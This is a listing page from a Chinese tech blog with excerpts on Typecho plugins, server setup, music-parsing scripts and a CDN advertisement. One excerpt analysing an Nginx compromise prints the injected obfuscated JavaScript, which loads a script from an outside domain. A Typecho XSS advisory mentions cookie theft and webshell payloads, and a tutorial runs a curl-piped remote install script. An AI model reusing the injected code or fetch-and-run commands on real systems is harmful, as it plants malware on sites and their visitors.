广告
- 最新文章
- 热门文章
- 评论最多
- 点赞最多
-
![[更新记录]博客更新优化记录](/bizhi/ZfOTYsG8ntCRhMW.gif)
置顶 [更新记录]博客更新优化记录 前言本博客优化模板基于Joe原版来进行美化 目前主题最新版为7.3.7在这里感谢Joe作者(78.al){dotted startColor="#ff6c6c" endColor="#1989fa"/}优化及修改{message type="info" content="博主一直倾听访客的建议优化博客 在此非常感谢你们!如果大家还有发现什么BUG 可以在评论区留言 感谢合作!(必须要说清楚BUG的触发方式 这样博主才能快速定位问题)"/}2024年优化修改{collapse}{collapse-item label="2024.9月 优化及修改"} {x} 侧边栏伸缩按钮根据存储保存页面状态 {x} 夜间模式功能修改为存储cookie方式保存{/collapse-item}{/collapse}2023年优化修改{collapse}{collapse-item label="2023.8月 优化及修改"}{callout color="#f0ad4e"} {x} 夜间模式添加跟随系统 //2023.8.29{/callout}{/collapse-item}{collapse-item label="2023.7月 优化及修改"}{callout color="#f0ad4e"} {x} 加强主题API请求验证 //2023.7.10 {x} 修改主题API请求方式 //2023.7.12 {x} 重构主题API接口 彻底加强验证 //2023.7.15{/callout}{/collapse-item}{collapse-item label="2023.6月 优化及修改"}{callout color="#f0ad4e"} {x} 动态页面支持视频解析 //2023.6.24{/callout}{/collapse-item}{collapse-item label="2023.5月 优化及修改"}{callout color="#f0ad4e"} {x} 增加侧边栏双侧显示 //2023.5.17{/callout}{/collapse-item}{collapse-item label="2023.4月 优化及修改"}{callout color="#f0ad4e"} {x} 增加侧边栏左右侧显示选项 //2023.4.1 {x} 增加首页以及全局关闭开启选项 //2023.4.2 {x} 修复一个伪造XFF头的漏洞 //2023.4.8{/callout}{/collapse-item}{collapse-item label="2023.3月 优化及修改"}{callout color="#f0ad4e"} {x} 增加一个相册样式 我的相册 //2023.3.3 {x} 美化博客样式 //2023.3.3 {x} 博客增加夜间星光模式 //2023.3.3 {x} 头图支持视频格式播放 //2023.3.3 {x} 新增加全局animation动画效果 //2023.3.4 {x} 优化全局动画效果 //2023.3.7 {x} 增加文章打赏功能 //2023.3.9 {x} 重构头图 PC端增加搜索框显示 //2023.3.17 {x} 新增文章页面单独设置广告显示 //2023.3.28 {x} 评论支持隐私(密语)功能 //2023.3.30{/callout}{/collapse-item}{collapse-item label="2023.2月 优化及修改"}{callout color="#f0ad4e"} {x} 根据反馈 修复评论以及搜索框的问题 //2023.2.4 {x} 侧边栏标签云增加样式 //2023.2.4 {x} 新增游客需要登录后才能评论功能 //2023.2.9 {x} 博客新增加全局pjax刷新功能(正在测试当中) //2023.2.10 {x} 友链页面获取方式修改为api(直接输出全部友链) //2023.2.10 {x} 修复页面大标题在某些浏览器下 显示不正确的问题 //2023.2.17{/callout}{/collapse-item}{collapse-item label="2023.1月 优化及修改"}{callout color="#f0ad4e"} {x} 优化搜索框样式 //2023.1.9 {x} 优化评论框表情优先加载问题 //2023.1.14 {x} 优化卡片列表显示效果 //2023.1.14 {x} 博客增加页面缓存功能(外部插件TpCache) //2023.1.20 {x} 修复启用缓存插件之后 导致文章点赞和浏览量显示不准确的问题 //2023.1.23 {x} 博客增加文章目录/导读功能(只在文章左侧显示) //2023.1.24{/callout}{/collapse-item}{/collapse}2022年优化修改{collapse}{collapse-item label="2022.12月 优化及修改"}{callout color="#f0ad4e"} {x} 热门文章列表添加分类显示 //2022.12.5 {x} 修复文章列表动画消失问题 //2022.12.5 {x} 文章Loading加载根据文章列表样式切换和动态加载所需的CSS文件 //2022.12.5 {x} 主题初步兼容PHP8.2 //2022.12.21 {x} 主题图片沙箱插件更换4.0.31版本 //2022.12.23 {x} 主题添加最新壁纸选项(壁纸独立页面) //2022.12.24{/callout}{/collapse-item}{collapse-item label="2022.11月 优化及修改"}{callout color="#f0ad4e"} {x} 博客文章增加字数和阅读时间显示 //2022.11.11 {x} 新增首页文章列表样式(后台可自由切换) //2022.11.13 {x} 音乐插件增加QQ音乐cookie解析 //2022.11.25 {x} 网站增加Service Worker离线缓存机制 //2022.11.26{/callout}{/collapse-item}{collapse-item label="2022.10月 优化及修改"}{callout color="#f0ad4e"} {x} 博客增加浏览器Notification通知 //2022.10.10 {x} 博客增加Loading动画显示(后台可关闭) //2022.10.13 {x} PC导航栏添加icon图标 //2022.10.12 {x} 博客友链新增样式(后台可自选择) //2022.10.12 {x} 文章导航面包屑调整 不再合并文章 //2022.10.18 {x} Loading动画增加多个样式选择 //2022.10.18 {x} 背景图支持填写多张图片地址 //2022.10.24 {x} 右下角添加浏览器全屏按钮 //2022.10.25 {x} 右下角添加简繁切换按钮 //2022.10.25{/callout}{/collapse-item}{collapse-item label="2022.9月 优化及修改"}{callout color="#f0ad4e"} {x} 修复百度收录状态获取失效问题 //2022.9.1 {x} 后台增加IP端口获取 //2022.9.2 {x} 评论输入QQ自动识别昵称 //2022.9.5 {x} 评论增加登录状态判断(近期准备开放注册) //2022.9.10 {x} 评论增加多个机型 //2022.9.10 {x} 评论删除画图功能 //2022.9.16 {x} 判断UA信息是否显示机型 (电脑不显示 手机则显示) //2022.9.29{/callout}{/collapse-item}{collapse-item label="2022.8月 优化及修改"}{callout color="#f0ad4e"} {x} 评论agent来源识别兼容UserAgent插件(二选一) //2022.8.6 {x} IP属地兼容插件(二选一) //2022.8.8 {x} 侧边栏最新回复添加IP属地和UserAgent信息显示 //2022.8.8 {x} 优化电脑端2K以上的分辨率显示效果 将85%改成1370px显示(感谢月宅酱) //2022.8.8 {x} 取消独立页面侧边栏显示效果 //2022.8.8 {x} 优化音乐播放器字体颜色统一 //2022.8.8 {x} 首页文章切换分页按钮选项(后台自由切换 默认按钮) //2022.8.8 {x} IPV6 IPV4获取归属地改为内置主题(调用免费纯真IP本地数据库) //2022.8.11 {x} 评论识别判断Windows11从JS获取方式改为PHP直接判断 //2022.8.11 {x} 夜间/白天模式根据时间自动切换(正式启用 感谢星空大佬的代码) //2022.8.11 {x} 修复自动夜间模式之后 按钮需要点击两次才能切换回白天模式的问题 //2022.8.13 {x} 修复评论头像泄露QQ号的问题(调用官方API) //2022.8.22 {x} 正式兼容PHP8.1(已测试完毕) //2022.8.23 {x} 修复按钮加载加载不全问题 //2022.8.30 {x} 统计页面-文章归档添加评论和文章数显示 //2022.8.31{/callout}{/collapse-item}{collapse-item label="2022.7月 优化及修改"}{callout color="#f0ad4e"} {x} 评论agent来源识别增加图标显示(完成并实装) //2022.7.24 {x} 主页以及文章页面添加高斯模糊 统一优化字体颜色(完成并实装) //2022.7.27 {x} 修复夜间模式字体颜色不统一的问题(完成并实装) //2022.7.27 {x} 博客增加侧边栏伸缩按钮(感谢灵感乌托邦提供的代码支持!) //2022.7.27 {x} 去除首页大图功能 更改为显示大字体! //2022.7.27 {x} 修复手机wap壁纸设置显示PC壁纸问题 //2022.7.27 {x} 修复开启夜间模式背景图片区域显示纯黑问题 //2022.7.27 {x} 修复开启PHP8.1后评论获取父级评论@报错问题 //2022.7.29 {x} 评论增加图片功能(提供更方便的优化建议) //2022.7.29 {x} 修复评论获取IP归属地失效问题 //2022.7.31{/callout}{/collapse-item}{collapse-item label="2022.6月 优化及修改"}{callout color="#f0ad4e"} {x} 网站部分图片增加鉴权功能(完成并实装) //2022.6.6 {x} 增强评论提交以及文章发布显示时间(完成并实装) //2022.6.10 {x} 文章评论显示提交者IP'默认隐藏后两段'(完成并实装) //2022.6.10 {x} 评论增加Windows11系统识别(完成并实装) //2022.6.18 {x} 评论添加验证码限制(弃用) //2022.6.25 {x} 初步兼容PHP8.1(正在实验中) //2022.6.26 {x} 侧边栏评论显示评论的文章来源(完成并实装) //2022.6.29{/callout}{/collapse-item}{collapse-item label="2022.5月 优化及修改"}{callout color="#f0ad4e"} {x} 优化博客整体打开速度(CDN已经换成华为云·百度云·酷盾) {x} 优化文章图片加载速度(CDN已经换成华为云·百度云·酷盾) {x} 优化博客评论框架(持续优化中) {x} 调整今后发布的文章目标类型(已完成) {x} 调整博客UI美观度(持续优化中) {x} 修复PHP8以及Nginx1.21带来的问题(已完成) {x} 增加手机系统识别(持续优化中) {x} 评论增加更多机型以及浏览器显示(持续优化中) {x} 去除部分不必要的特效(已完成) {x} 网站支持IPV6协议访问(大部分已完成 部分资源还未支持IPV6) {x} 评论增加归属地显示(完成并实装 还有优化空间) //2022.5.21{/callout}{/collapse-item}{/collapse}{dotted startColor="#ff6c6c" endColor="#1989fa"/}规划目标添加iPhone设备型号识别(正在弄)文章页面添加目录树功能(已完成)博客增加pjax加载(测试中)评论修改UI(弃案)友链增加分类(正在规划)增加Redis缓存页面功能(已完成)网站增加PWA应用支持(弃案)评论增加私密评论功能选项(已完成)文章输出方式从直接输出改为API输出(正在规划)增加需要登录才能评论(已完成)兼容PHP8.2(已完成)如果你们有发现什么问题 或者出现什么BUG 可以在底部留言 我会尽可能的在留言几天内优化完成多谢合作! -
置顶 酷盾安全 - 高防Edge SCDN 生态合作OEM系统上线 酷盾安全Edge SCDN生态合作计划OEM代理系统正式上线,具有以下功能:支持一键同步,全站监控统计,整站站点统一管理,自定义套餐价格,自定义流量包价格,站点品牌全站设置,攻击态势感知图,基于对市场需求的把控,你想要的功能基本都能满足,基于酷盾v3系统独家开发,采用和官网同等UI设计,目前Saas合作方式,方便运营商快速上线。只需要解析一个已备案域名便可快速上线,每个代理商拥有独立的数据,可配置自己的收款支付、短信、认证接口,支持定制CC防护 WAF策略,代理商享受快速人工在线客服对接处理售后问题,让您无忧运营,快速建立直接的SCDN品牌,扎根SCDN安全加速海洋。官网 酷盾安全官网:点击前往 合作方案为了市场可持续,稳定,良性发展,我们针对合作商,有一定要求,需进行预存或根据消费金额获取不同的优惠力度,对于同行从业者或有一定的客户基础合作商我们也有相应的优惠合作计划。详情参考或联系在线客服:https://www.kdun.cn/partner/如需要OEM合作演示站点,联系在线客服即可。部分系统页面展示 仅提供部分展示,具体详细请联系客服获取,未来我们会逐步更新更多功能,满足日益增长的市场需求。 管理员首页看板管理员多数据看板/整站流量监控一目了然/各类快捷地址方便快速直达全站网站管理各类模式搜索快速指定查找/丰富完善的功能:SSL申请,缓存清理/详细全站域名数据统计实时数据实时统计/整站资源排行榜/攻击分析/黑名单统计/日志分析及下载/用量查询黑名单即刻查询实时上报/快速解封/一键导出/攻击分析快速调整应对规则5攻击态势感知告别冗杂攻击维护成本/快速定位被攻击网站/即可响应,快速拦截基础系统设置完全自主化(品牌/支付/短信/邮箱等)/建立自己的独有Edge SCDN安全品牌/前台后台数据无缝对接 实现报表一体化套餐同步一键快速同步自动上游资源/轻松补充优质货源/自定义价格无库存压力/实现分钟级运营上线在线一键更新0代码基础 在线升级更新/降低运维成本,维护更简单/多维度解决运维难题,专心营销运营 除上述功能外,我们还提供更多优势,只为助力你遨游SCDN安全加速海洋酷盾安全生态计划OEM系统优势稳定的防御线路:目前酷盾安全高防Edge SCDN已积累多种行业解决方案,论坛、商城、小程序、商品限时购买等场景,合作过多家大型企业,积累了超7年的行业防护经验。 独立的人工售后支持:高防Edge SCDN OEM系统可快速创建自有安全防护品牌,只需简单几步就可快速对接上线产品,系统支持在线维护升级,每家合作商我们提供单独的售后群,支持免费定制防御策略,无技术门槛,专心运营。 完善的高防SCDN资源池:酷盾拥有国内多地域高防节点及海外线路多种线路选择,海外节点遍布各大洲,如亚洲,欧洲,非洲,北美洲,南美洲,澳洲。售价从 99 元至几千元不等(合作商,更享受折上折),也支持定制不同类型线路的高防SCDN,产品覆盖用户人群多。能更好的满足市场需求。目前有不少国内IDC企业合作中,对于有兴趣拓展高防Edge SCDN业务的公司,我们随时欢迎合作。
-
[技术分享]宝塔面板PHP安装IMAP扩展失败解决方法 错误截图解决方法CentOS7下的解决方案为yum install -y libc-client-devel对应的Centos 9/Rhel 9/AlmaLinux 9/RockyLinux 9的安装方式(如果是Centos 8/Rhel 8/Alma Linux 8/Rocky Linux 8系列的,把9替换成8即可)wget http://rpms.remirepo.net/enterprise/remi-release-9.rpm rpm -Uvh remi-release-9.rpm dnf -y --enablerepo=remi install uw-imap-devel然后就可以去安装imap扩展了安装完成后,还需要在PHP-禁用函数中删除imap_open,否则imap模块依然无法连接imap服务器
-
[Python源码]QQ音乐无损解析开源 使用方法先安装 文件所需要的依赖模块 pip install -r requirements.txt再运行app.py文件即可环境要求Python >= 3请求示例如图箭头显示参数列表请求链接选择 http://ip:port/song 请求方式 GET参数列表参数说明url解析获取到的QQ音乐地址返回数据song[] = 包含歌名 专辑 歌手 图片lyric[] = 包含原文歌词 翻译歌词(如果有)music_urls[] = 包含'm4a', '128', '320', 'flac', 'ape'等歌曲链接其中flac和ape为无损 320为高品质 m4a和128为标准音质Github项目地址{cloud title="QQ音乐无损解析" type="github" url="https://github.com/Suxiaoqinx/tencent_url" password=""/}注意事项请先在app.py中的cookie_str填写入你从y.qq.com获取到的cookie才可以解析!其中 要解析VIP歌曲以及无损以上音质 请获取会员账号的cookie
-
[Python源码]工信部ICP备案查询接口源码-修复 使用方法先安装 文件所需要的依赖模块 pip install -r requirements.txt再运行mainapi.py文件即可环境要求Python >= 3请求示例如图显示参数列表请求链接选择 http://ip:port/query请求方式 GET参数列表参数说明domain域名url地址typecache(则缓存) 为空则不缓存感谢Ravizhan 原项目地址Github地址{cloud title="ICP备案查询" type="github" url="https://github.com/Suxiaoqinx/icp_api" password=""/}备注官网反爬策略较为玄学,请勿疯狂请求运行结果为原始响应,如有需要请自行解析
-
[Typecho插件]Typecho上传图片自动转为Webp/Avif格式插件 文章前言插件目前支持 GD imagemagick ffmpeg压缩库插件设置使用说明解压后修改文件夹名为 SwitchImges,将插件上传至网站目录的 /usr/plugins 下在 Typecho 后台「插件管理」处启用插件如果想要上传源格式 禁用插件即可!PHP有GD/imagemagick/ffmpeg扩展 一般GD和imagemagick扩展宝塔默认都自带 自行安装即可在PHP禁用函数一栏删掉shell_exec和exec函数Typecho 1.2.1 和 PHP7 以上均支持ffmpeg安装 执行这个命令即可bash <(curl https://gitee.com/baihu433/ffmpeg/raw/master/ffmpeg.sh)下载地址{cloud title="SwitchImges插件V1.3" type="lz" url="https://suxiaoq.lanzoul.com/iscM12m4puhg" password=""/}更新日志{collapse}{collapse-item label="2025.1.28 V1.3"}备份文件改为固定路径:/usr/uploads/年份/月份/backup禁用插件的时候 一并将所有备份的文件&目录全部删除{/collapse-item}{collapse-item label="2024.9.6 V1.2"}增加avif格式转换增加ffmpeg库去除cwebp库支持支持生成源文件备份(此版本从V1.0 V1.1更新上来之前必须禁用插件 然后再上传新的插件 启用){/collapse-item}{collapse-item label="2024.8.15 V1.1"}支持GIF转换为动态WebP增加imagemagick cwebp库调整底层代码 增强通读性{/collapse-item}{collapse-item label="2024.8.15 V1.0"}版本初构建 支持(JPG|PNG|GIF|JPGE){/collapse-item}{/collapse}
-
[PHP源码]PHP最新获取QQ昵称源码 接口说明本接口来源于官方源码分享<?php function get_qq_nick($qqCode) { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, 'https://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=' . $qqCode); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_CUSTOMREQUEST, 'GET'); curl_setopt($curl, CURLOPT_POSTFIELDS, '------WebKitFormBoundaryYTwvlk5brGmyD3Mn'); curl_setopt($curl, CURLOPT_HTTPHEADER, [ 'Content-Type: multipart/form-data; boundary=---011000010111000001101001', ]); $response = curl_exec($curl); $encode = mb_detect_encoding($response, array("ASCII", 'UTF-8', "GB2312", "GBK", 'BIG5')); $response = mb_convert_encoding($response, 'UTF-8', $encode); $name = json_decode(substr($response, 17, -1), true); curl_close($curl); return $name[$qqCode][6]; } echo get_qq_nick('3074193836'); ?>注意事项如果上传了没法使用 请检查服务器环境1.是否为国内服务器(不是必须)2.PHP环境是否为7-83.服务器是否正确安装环境
-
[技术教程]宝塔Nginx开启支持HTTP3/QUIC协议 - 简易教程 报错解决如果提示以下报错[warn] the listen ... http2请根据报错的站点内配置文件把 ssl http2 中的http2去掉如果想要开启HTTP2的话 请看下面的站点配置 http2 on单独添加进去即可注意事项博主测试过Let's Encrypt和Zerossl以及TrustAsia的免费证书这三款都支持QUIC协议 其他证书理论也是支持的!准备工作已经安装好宝塔面板和Nginx环境HTTP3/QUIC检测地址 http3check.net教程开始自编译教程 - 点击这个 {message type="success" content="宝塔最新已经支持Nginx 1.25 直接安装即可"/}在ssh里面执行以下命令wget https://download.bt.cn/install/0/nginx5.sh bash nginx5.sh install 1.25等待命令执行完毕 进面板查看 Nginx版本是否为1.25站点配置在所有的 server 域中,只需要有一个 server 域中配置 reuseport 选项即可listen 443 ssl; listen 443 quic reuseport; listen [::]:443 ssl; listen [::]:443 quic reuseport; http2 on;其他的 如下配置即可listen 443 ssl; listen 443 quic; listen [::]:443 ssl; listen [::]:443 quic; http2 on;在站点的Nginx配置文件 大概26 27行添加以下代码ssl_early_data on; add_header Alt-Svc 'h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"';然后重启 Nginx即可生效!防火墙配置防火墙将443端口UDP开放 宝塔在面板-左侧安全里面配置 腾讯云 / 阿里云 / 华为云 等 添加安全组即可浏览器配置谷歌Chrome浏览器 访问:chrome://flags/ 启用:Experimental QUIC protocol (enable-quic) 微软新版Edge浏览器 访问:edge://flags 启用:Experimental QUIC protocol 设置为“Enabled” 火狐Firefox浏览器 访问:about:config 启用:network.http.http3.enabled
-
-
-
[PHP源码]工信部ICP备案查询接口源码 文章前言接口已失效!最近爆肝API接口源码 累死了我这几天应该不会再更新了 如果有需要的话 可以QQ找我接口说明本源码接口抓取于 工信部备案系统 请勿频繁请求 导致IP被限制拉黑源码截图下载地址隐藏内容,请前往内页查看详情更新日志{collapse}{collapse-item label="更新日志 10月份" open} {x} 优化代码结构 //2023.10.4 {x} 增加支持网站 APP备案查询 //2023.10.4{/collapse-item}{collapse-item label="更新日志 9月份" open} {x} 修复接口失效问题 //2023.9.3{/collapse-item}{/collapse}注意事项如果上传了没法使用 请检查服务器环境1.是否为国内服务器(不是必须)2.PHP环境是否为7-83.服务器是否正确安装环境
-
[PHP源码]PHP获取QQ昵称源码 文章前言最近发现网上发的获取QQ昵称接口基本都失效了我重新写了份 应该可以用接口列表{mtitle title="接口1(半失效 取出昵称乱码)"/}http://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins={mtitle title="接口2(半失效 验证cookie)"/}http://r.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?g_tk=gtk&uins=源码截图下载地址{cloud title="QQ昵称获取源码" type="lz" url="https://suxiaoq.lanzoul.com/iYtBC117qulc" password=""/}注意事项如果上传了没法使用 请检查服务器环境1.是否为国内服务器(不是必须)2.PHP环境是否为7-83.服务器是否正确安装环境
-
[Typecho插件]IP归属地显示插件 文章前言插件支持IPV6和IPV4归属地获取并且 为了避免卡顿或者获取失败 数据库都是本地 不调用任何第三方API接口演示图使用说明解压后修改文件夹名为 XQLocation,将插件上传至网站目录的 /usr/plugins 下在 Typecho 后台「插件管理」处启用插件在需要显示的地方插入以下代码:<?php XQLocation_Plugin::render($comments->ip); ?>(此项也适用于后台)如果是系统自带的评论框架找到var/Widget/Comments/Archive.php大概为108行,插入<?php XQLocation_Plugin::render($this->ip); ?>下载地址{cloud title="XQLocation_V1.3.zip" type="lz" url="https://suxiaoq.lanzoul.com/iCQx62fgkieb" password=""/}更新日志{collapse}{collapse-item label="2024.11.18 V1.3"}增加后台评论提交钩子{/collapse-item}{collapse-item label="2024.9.19 V1.2"}添加获取IP来源选项 (站点加了CDN可以选择){/collapse-item}{collapse-item label="2023.7.1 V1.1"}修复关闭IP属地显示之后报错问题增加图标显示开关选项增加IPV4数据库选项修复部分BUG错误{/collapse-item}{collapse-item label="2023.6.23 V1.0"}版本初构建{/collapse-item}{/collapse}
-
[原创源码]网易云无损解析开源 环境编写Python 3.10Flask模块接口列表https://interface3.music.163.com/eapi/song/enhance/player/url/v1源码截图Github项目地址{cloud title="网易云无损解析" type="github" url="https://github.com/Suxiaoqinx/Netease_url" password=""/}网易云无损解析使用方法先安装 文件所需要的依赖模块 pip install -r requirements.txt再运行main.py文件即可参数列表http://127.0.0.1:5000/Song_V1?ids=(填写歌曲链接或者ID)&level=(填写需要解析的音质)&type=(down json text)演示列表在线解析注意事项请先在cookie.txt文件内填入黑胶会员账号的cookie 才可以解析!反馈方法请在Github的lssues反馈 或者到我博客反馈感谢Ravizhan
-
[软件分享]网易云音乐无损解析软件 文章前言此软件源码不是站长编写 我在这里感谢Ravizhan大佬 帮我分析了这么久的源码!!他的 Github 地址 有兴趣可以去看看环境编写Python 3.10接口列表{mtitle title="接口1"/}https://interface3.music.163.com/eapi/song/enhance/player/url/v1{mtitle title="接口2"/}https://interface3.music.163.com/eapi/song/enhance/player/url接口2已增加进软件 需要的可以自己选择解析软件截图更新进度下载以及进度条显示(已完成)让用户自行填入cookie选项(已完成)自行登录获取cookie(已完成)优化软件性能更新日志{collapse}{collapse-item label="2023.7月 更新修复"}{callout color="#f0ad4e"} {x} 接口1新增高清环绕声,沉浸环绕声, 超清母带音质解析 //2023.7.27 {x} 修复输入音乐ID解析报错的问题 //2023.7.27 {x} 修复无头浏览器调用失败问题 //2023.7.27{/callout}{/collapse-item}{collapse-item label="2023.4月 更新修复"}{callout color="#f0ad4e"} {x} 首次更新 //2023.4.16 {x} 增加多接口选择 //2023.4.17 {x} 增加歌名 歌手 图片等获取 //2023.4.17 {x} 音质增加Hires获取 //2023.4.17 {x} 增加了音乐下载和进度条功能 //2023.4.20 {x} 自行登录和手动填入cookie选项 //2023.4.20 {/callout}{/collapse-item}{/collapse}下载地址隐藏内容,请前往内页查看详情使用说明版本V1.3更新日志1.接口1新增高清环绕声,沉浸环绕声, 超清母带音质解析 *2.修复输入音乐ID解析报错的问题3.修复无头浏览器调用失败问题标记*号的是重要更新!
-
-
[漏洞预警]Typecho <= 1.2.0 版本评论爆出严重的存储型XSS漏洞 漏洞发现发现于2023年3月25号影响版本Typecho <= 1.2.0 版本https://github.com/typecho/typecho/issues/1545https://github.com/typecho/typecho/issues/1546漏洞复现漏洞公开POC目前 此漏洞公开的POC有:获取Cookie通过404.php写入一句话木马这个漏洞危险系数很高,可以直接前台拿Shell。修复建议更新到最新版 > https://github.com/typecho/typecho/releases/tag/v1.2.1-rc最新版1.2.1Rc已经修复此漏洞,大家应该尽快更新到最新版本。直接从数据库里面删除评论,千万不要从后台删除,否则会被xss代码拿到cookie!
-
[CDN评测]整理站长使用过的国内CDN合集 文章前言本文基于站长使用过的CDN整理体验评测如有不对的地方 请在底部评论区留言!国内CDN腾讯云官网: https://cloud.tencent.com作为国内知名云服务商 我首推当然就是腾讯云了。老用户每个月都送10G流量包对于个人博客站点而言,已经足够用了而且,活动又多,流量包费用也不贵。奇安信网站卫士官网: https://wangzhan.qianxin.com奇安信网站卫士原本是360旗下的,后来分家了,就自己出来单干了。这家的CDN怎么说呢,说好不好,说差不差,CC和waf防护做得挺好,但缓存不怎么样,给的节点又少。毕竟也不是专注加速的,如果关注防护的话,可以去体验体验。百度云加速官网: https://su.baidu.com作为最早的免费CDN,早期和Cloudflare合作的节点防护挺不错的,后来取消合作了。此CDN分为免费版和专业版,免费版和专业版均支持上传SSL证书,但免费版不支持关闭5秒盾。免费版的节点很少,并且在实际使用中,我遇到的问题就有,时不时会出现指向一个 "IP没法访问" 的问题。酷盾安全官网: https://www.kdun.cn虽然这家CDN投入使用的时间不长,但在站长这几个月的使用时间,非常值得推荐使用。界面UI好看,上手简单方便。不仅有CDN该有的缓存加速效果以及众多Waf规则供你选择,CC防护也很好。文章后言本篇文章就到这里了。以上付费的,我个人推荐追求速度与质量可以选择腾讯云,毕竟大厂嘛,懂得都懂。如果是防御和速度的话,可以选择酷盾安全,本站亲测。免费的,个人推荐奇安信网站卫士和百度云加速,看个人选择吧!
-
[原创分享]Typecho主题增加文章目录树功能 注意事项本教程需要改的东西众多 请各位备份好主题文件 以免失败无法恢复!本次教程以Joe7.7.1版本 为基础 7.3.6按道理也能用具体演示可以看我博客!教程开始这里我以Joe主题为例 各个主题的不相同 请自行判断在/Joe/post.php内添加以下代码 大概41行<?php if ($this->options->jfloor === 'on') : ?> <?php GetCatalog(); ?> <?php endif; ?>Joe主题的function.php文件在/Joe/core/function.php在 大概290行添加以下代码function CreateCatalog($obj) { global $catalog; global $catalog_count; $catalog = array(); $catalog_count = 0; $obj = preg_replace_callback('/<h([1-6])(.*?)>(.*?)<\/h\1>/i', function ($obj) { global $catalog; global $catalog_count; $catalog_count++; $catalog[] = array('text' => trim(strip_tags($obj[3])), 'depth' => $obj[1], 'count' => $catalog_count); return '<h' . $obj[1] . $obj[2] . ' id="cl-' . $catalog_count . '"><span>' . $obj[3] . '</span></h' . $obj[1] . '>'; }, $obj); return $obj; } function GetCatalog() { global $catalog; $index = ''; if ($catalog) { $index = '<ul>'; $prev_depth = ''; $to_depth = 0; foreach ($catalog as $catalog_item) { $catalog_depth = $catalog_item['depth']; if ($prev_depth) { if ($catalog_depth == $prev_depth) { $index .= '</li>'; } elseif ($catalog_depth > $prev_depth) { $to_depth++; $index .= '<ul>'; } else { $to_depth2 = ($to_depth > ($prev_depth - $catalog_depth)) ? ($prev_depth - $catalog_depth) : $to_depth; if ($to_depth2) { for ($i = 0; $i < $to_depth2; $i++) { $index .= '</li></ul>'; $to_depth--; } } $index .= '</li>'; } } $index .= '<li><a href="#cl-' . $catalog_item['count'] . '" data-href="#cl-' . $catalog_item['count'] . '">' . $catalog_item['text'] . '-h'.$catalog_item['depth'].'</a>'; $prev_depth = $catalog_item['depth']; } for ($i = 0; $i <= $to_depth; $i++) { $index .= '</li></ul>'; } $index = '<div class="j-floor"><div class="contain" id="jFloor" style="top: 126px;"><div class="title">文章目录</div>' . $index . '<svg class="toc-marker" xmlns="http://www.w3.org/2000/svg"><path stroke="var(--theme)" stroke-width="3" fill="transparent" stroke-dasharray="0, 0, 0, 1000" stroke-linecap="round" stroke-linejoin="round" transform="translate(-0.5, -0.5)" /></svg></div></div>'; } echo $index; }然后在/Joe/core/core.php文件大概83行 添加以下代码 if ($self->is('single')) { $self->content = CreateCatalog($self->content); }再然后在/Joe/function.php文件大概920行 添加外观后台设置开关//开启文章目录树显示 $jfloor = new Typecho_Widget_Helper_Form_Element_Select( 'jfloor', array( 'off' => '关闭(默认)', 'on' => '开启', ), 'off', '是否启用文章目录树显示', '介绍:开启之后 在文章最左侧显示目录树(手机端不显示)' ); $jfloor->setAttribute('class', 'joe_content joe_post'); $form->addInput($jfloor->multiMode()); 解压所需的文件将以下压缩包解压到/Joe/assets目录内解压完 然后打开post.php引用解压的文件 jfloor.min.css以及jfloor.min.js在头部引用css <link href="<?php _getAssets('assets/css/jfloor.min.css'); ?>" rel="stylesheet"> 在底部引用js <?php if ($this->options->jfloor === 'on') : ?> <!-- 目录树 --> <script src="<?php _getAssets('assets/js/jfloor.min.js'); ?>"></script> <?php endif; ?>{cloud title="Joe目录树" type="lz" url="https://suxiaoq.lanzoul.com/iDI480pzgrih" password=""/}
-
-
[技术分享]宝塔面板Nginx异常事件解析 事件经过前几天在Hostloc论坛上看到的 https://hostloc.com/thread-1111691-1-1.html宝塔上也有人反馈https://www.bt.cn/bbs/thread-105054-1-1.htmlhttps://www.bt.cn/bbs/thread-105085-1-1.html宝塔官方公告https://www.bt.cn/bbs/thread-105121-1-1.html样本解析查看病毒样本和被插入的JS代码{mtitle title="原混淆代码"/}var _0x2551=["\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x73\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x77\x61\x66\x5F\x73\x63","\x35\x38\x38\x39\x36\x34\x37\x37\x32\x36","\x25\x33\x43\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x6D\x65\x74\x61\x6D\x61\x72\x6B\x65\x74\x2E\x71\x75\x65\x73\x74\x2F\x6D\x61\x72\x6B\x65\x74\x2E\x6A\x73\x27\x25\x33\x45\x25\x33\x43\x2F\x73\x63\x72\x69\x70\x74\x25\x33\x45","\x77\x72\x69\x74\x65"];function setc(_0x7338x2,_0x7338x3,_0x7338x4){var _0x7338x5= new Date();_0x7338x5[_0x2551[1]](_0x7338x5[_0x2551[0]]()+ _0x7338x4);document[_0x2551[2]]= _0x7338x2+ _0x2551[3]+ _0x7338x3+ _0x2551[4]+ _0x7338x5[_0x2551[5]]()}setc(_0x2551[6],_0x2551[7],360);document[_0x2551[9]](unescape(_0x2551[8]));{mtitle title="解混淆代码"/}var _0x2551 = ["getMinutes", "setMinutes", "cookie", "=", ";expires=", "toUTCString", "waf_sc", "5889647726", "%3Cscript src='https://www.metamarket.quest/market.js'%3E%3C/script%3E", "write"]; function setc(_0x7338x2, _0x7338x3, _0x7338x4) { var _0x7338x5 = new Date(); _0x7338x5[_0x2551[1]](_0x7338x5[_0x2551[0]]() + _0x7338x4); document[_0x2551[2]] = _0x7338x2 + _0x2551[3] + _0x7338x3 + _0x2551[4] + _0x7338x5[_0x2551[5]](); } setc(_0x2551[6], _0x2551[7], 360); document[_0x2551[9]](unescape(_0x2551[8]));在解码完这个JavaScript代码 我们可以看到关键词符 "Write" 和 "%3Cscript src='https://www.metamarket.quest/market.js'%3E%3C/script%3E" (%3C和%3E是HTML编码 转过来则是<和>)此代码直接利用 document.write 向页面插入script标签<script 